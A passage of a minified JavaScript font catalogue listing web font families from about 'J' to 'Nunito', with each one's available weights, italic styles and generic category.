One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic Coding",v:[400,700],f:"monospace"},{n:"Nanum Myeongjo",v:[400,700,800],f:"serif"},{n:"Nanum Pen Script",v:[400],f:"handwriting"},{n:"Neonderthaw",v:[400],f:"handwriting"},{n:"Nerko One",v:[400],f:"handwriting"},{n:"Neucha",v:[400],f:"handwriting"},{n:"Neuton",v:["200","300",400,"400i",700,800],f:"serif"},{n:"New Rocker",v:[400],f:"display"},{n:"New Tegomin",v:[400],f:"serif"},{n:"News Cycle",v:[400,700],f:"sans-serif"},{n:"Newsreader",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Niconne",v:[400],f:"handwriting"},{n:"Niramit",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Nixie One",v:[400],f:"display"},{n:"Nobile",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Nokora",v:["100","300",400,700,900],f:"sans-serif"},{n:"Norican",v:[400],f:"handwriting"},{n:"Nosifer",v:[400],f:"display"},{n:"Notable",v:[400],f:"sans-serif"},{n:"Nothing You Could Do",v:[400],f:"handwriting"},{n:"Noticia Text",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Emoji",v:["300",400,500,600,700],f:"sans-serif"},{n:"Noto Kufi Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Music",v:[400],f:"sans-serif"},{n:"Noto Naskh Arabic",v:[400,500,600,700],f:"serif"},{n:"Noto Nastaliq Urdu",v:[400,500,600,700],f:"serif"},{n:"Noto Rashi Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Noto Sans Adlam",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Adlam Unjoined",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Anatolian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Arabic",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Armenian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Avestan",v:[400],f:"sans-serif"},{n:"Noto Sans Balinese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bamum",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Bassa Vah",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Batak",v:[400],f:"sans-serif"},{n:"Noto Sans Bengali",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Bhaiksuki",v:[400],f:"sans-serif"},{n:"Noto Sans Brahmi",v:[400],f:"sans-serif"},{n:"Noto Sans Buginese",v:[400],f:"sans-serif"},{n:"Noto Sans Buhid",v:[400],f:"sans-serif"},{n:"Noto Sans Canadian Aboriginal",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Carian",v:[400],f:"sans-serif"},{n:"Noto Sans Caucasian Albanian",v:[400],f:"sans-serif"},{n:"Noto Sans Chakma",v:[400],f:"sans-serif"},{n:"Noto Sans Cham",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Cherokee",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Coptic",v:[400],f:"sans-serif"},{n:"Noto Sans Cuneiform",v:[400],f:"sans-serif"},{n:"Noto Sans Cypriot",v:[400],f:"sans-serif"},{n:"Noto Sans Deseret",v:[400],f:"sans-serif"},{n:"Noto Sans Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Noto Sans Duployan",v:[400],f:"sans-serif"},{n:"Noto Sans Egyptian Hieroglyphs",v:[400],f:"sans-serif"},{n:"Noto Sans Elbasan",v:[400],f:"sans-serif"},{n:"Noto Sans Elymaic",v:[400],f:"sans-serif"},{n:"Noto Sans Georgian",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Glagolitic",v:[400],f:"sans-serif"},{n:"Noto Sans Gothic",v:[400],f:"sans-serif"},{n:"Noto Sans Grantha",v:[400],f:"sans-serif"},{n:"Noto Sans Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Gunjala Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans HK",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Hanifi Rohingya",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Hanunoo",v:[400],f:"sans-serif"},{n:"Noto Sans Hatran",v:[400],f:"sans-serif"},{n:"Noto Sans Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Imperial Aramaic",v:[400],f:"sans-serif"},{n:"Noto Sans Indic Siyaq Numbers",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Inscriptional Parthian",v:[400],f:"sans-serif"},{n:"Noto Sans JP",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Javanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans KR",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Kaithi",v:[400],f:"sans-serif"},{n:"Noto Sans Kannada",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Kayah Li",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Kharoshthi",v:[400],f:"sans-serif"},{n:"Noto Sans Khmer",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Khojki",v:[400],f:"sans-serif"},{n:"Noto Sans Khudawadi",v:[400],f:"sans-serif"},{n:"Noto Sans Lao",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lepcha",v:[400],f:"sans-serif"},{n:"Noto Sans Limbu",v:[400],f:"sans-serif"},{n:"Noto Sans Linear A",v:[400],f:"sans-serif"},{n:"Noto Sans Linear B",v:[400],f:"sans-serif"},{n:"Noto Sans Lisu",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Lycian",v:[400],f:"sans-serif"},{n:"Noto Sans Lydian",v:[400],f:"sans-serif"},{n:"Noto Sans Mahajani",v:[400],f:"sans-serif"},{n:"Noto Sans Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mandaic",v:[400],f:"sans-serif"},{n:"Noto Sans Manichaean",v:[400],f:"sans-serif"},{n:"Noto Sans Marchen",v:[400],f:"sans-serif"},{n:"Noto Sans Masaram Gondi",v:[400],f:"sans-serif"},{n:"Noto Sans Math",v:[400],f:"sans-serif"},{n:"Noto Sans Mayan Numerals",v:[400],f:"sans-serif"},{n:"Noto Sans Medefaidrin",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Meetei Mayek",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito 